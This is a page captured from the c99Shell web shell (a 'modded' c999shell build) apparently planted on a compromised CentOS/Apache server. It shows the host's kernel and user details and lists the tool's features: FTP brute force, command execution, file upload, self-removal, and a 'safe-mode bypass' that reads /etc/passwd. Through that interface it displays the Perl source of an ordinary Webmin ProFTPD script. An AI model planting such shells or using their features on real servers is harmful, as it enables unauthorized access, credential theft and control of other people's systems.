!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/libexec/webmin/proftpd/   drwxr-xr-x
Free 50.93 GB of 127.8 GB (39.85%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     manual_form.cgi (3.91 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#!/usr/bin/perl
# manual.cgi
# Display a text box for manually editing directives

require './proftpd-lib.pl';
&ReadParse();
if ($in{'global'}) {
    $conf = &get_config();
    $global = &find_directive_struct("Global", $conf);
    $conf = $global->{'members'};
    if (defined($in{'limit'})) {
        # limit within the global section
        if ($in{'idx'}) {
            $d = $conf->[$in{'idx'}];
            $l = $d->{'members'}->[$in{'limit'}];
            $title = &text('limit_header4', $l->{'value'},
                       $d->{'words'}->[0]);
            }
        else {
            $l = $conf->[$in{'limit'}];
            $title = &text('limit_header7', $l->{'value'});
            }
        $return = "limit_index.cgi"; $rmsg = $text{'limit_return'};
        $file = $l->{'file'};
        $start = $l->{'line'}+1; $end = $l->{'eline'}-1;
        }
    else {
        # directory in the global section
        $d = $conf->[$in{'idx'}];
        $title = &text('dir_header5', $d->{'words'}->[0]);
        $return = "dir_index.cgi"; $rmsg = $text{'dir_return'};
        $file = $d->{'file'};
        $start = $d->{'line'}+1; $end = $d->{'eline'}-1;
        }
    }
elsif (defined($in{'virt'})) {
    if (defined($in{'limit'})) {
        # limit, maybe within a directory
        ($conf, $v) = &get_virtual_config($in{'virt'});
        if ($in{'anon'}) {
            $anon = &find_directive_struct("Anonymous", $conf);
            $conf = $anon->{'members'};
            }
        if ($in{'idx'} ne '') {
            $dir = $conf->[$in{'idx'}];
            $conf = $dir->{'members'};
            }
        $l = $conf->[$in{'limit'}];
        $ln = $l->{'value'};
        $title = $dir ?
            &text('limit_header4', $ln, $dir->{'words'}->[0]) :
            $in{'virt'} ?
            &text('limit_header1', $ln, $v->{'words'}->[0]) :
            &text('limit_header2', $ln);
        $return = "limit_index.cgi"; $rmsg = $text{'limit_return'};
        $file = $l->{'file'};
        $start = $l->{'line'}+1; $end = $l->{'eline'}-1;
        }
    elsif (defined($in{'idx'})) {
        # directory within virtual server
        ($vconf, $v) = &get_virtual_config($in{'virt'});
        if ($in{'anon'}) {
            $anon = &find_directive_struct("Anonymous", $vconf);
            $vconf = $anon->{'members'};
            }
        $d = $vconf->[$in{'idx'}];
        $dn = $d->{'words'}->[0];
        $title = $in{'anon'} ? &text('dir_header4', $dn) : $in{'virt'} ?
            &text('dir_header1', $dn, $v->{'words'}->[0]) :
            &text('dir_header2', $dn);
        $return = "dir_index.cgi"; $rmsg = $text{'dir_return'};
        $file = $d->{'file'};
        $start = $d->{'line'}+1; $end = $d->{'eline'}-1;
        }
    else {
        # virtual server
        ($conf, $v) = &get_virtual_config($in{'virt'});
        $title = $in{'virt'} eq '' ? $text{'virt_header2'} :
                 &text('virt_header1', $v->{'value'});
        $return = "virt_index.cgi"; $rmsg = $text{'virt_return'};
        $file = $v->{'file'};
        $start = $v->{'line'}+1; $end = $v->{'eline'}-1;
        }
    }
else {
    # Something in a .ftpaccess file
    if (defined($in{'limit'})) {
        # limit within .ftpaccess file
        $hconf = &get_ftpaccess_config($in{'file'});
        $l = $hconf->[$in{'limit'}];
        $file = $in{'file'};
        $start = $l->{'line'}+1; $end = $l->{'eline'}-1;
        $title = &text('limit_header6', $l->{'value'},
                   "<tt>$in{'file'}</tt>");
        $return = "limit_index.cgi";
        $rmsg = $text{'limit_return'};
        }
    else {
        # .ftpaccess file
        $file = $in{'file'};
        $title = &text('ftpindex_header', "<tt>$in{'file'}</tt>");
        $return = "ftpaccess_index.cgi";
        $rmsg = $text{'ftpindex_return'};
        }
    }
&ui_print_header($title, $text{'manual_title'}, "",
    undef, undef, undef, undef, &restart_button());

print &text('manual_header', "<tt>$file</tt>"),"<p>\n";
print "<form action=manual_save.cgi method=post enctype=multipart/form-data>\n";
foreach $h ('virt', 'idx', 'file', 'limit', 'anon', 'global') {
    if (defined($in{$h})) {
        print "<input type=hidden name=$h value='$in{$h}'>\n";
        push(@args, "$h=$in{$h}");
        }
    }
$args = join('&', @args);

print "<textarea rows=15 cols=80 name=directives>\n";
$lref = &read_file_lines($file);
if (!defined($start)) {
    $start = 0;
    $end = @$lref - 1;
    }
for($i=$start; $i<=$end; $i++) {
    print &html_escape($lref->[$i]),"\n";
    }
print "</textarea><br><input type=submit value=\"$text{'save'}\"></form>\n";

&ui_print_footer("$return?$args", $rmsg);


:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0053 ]--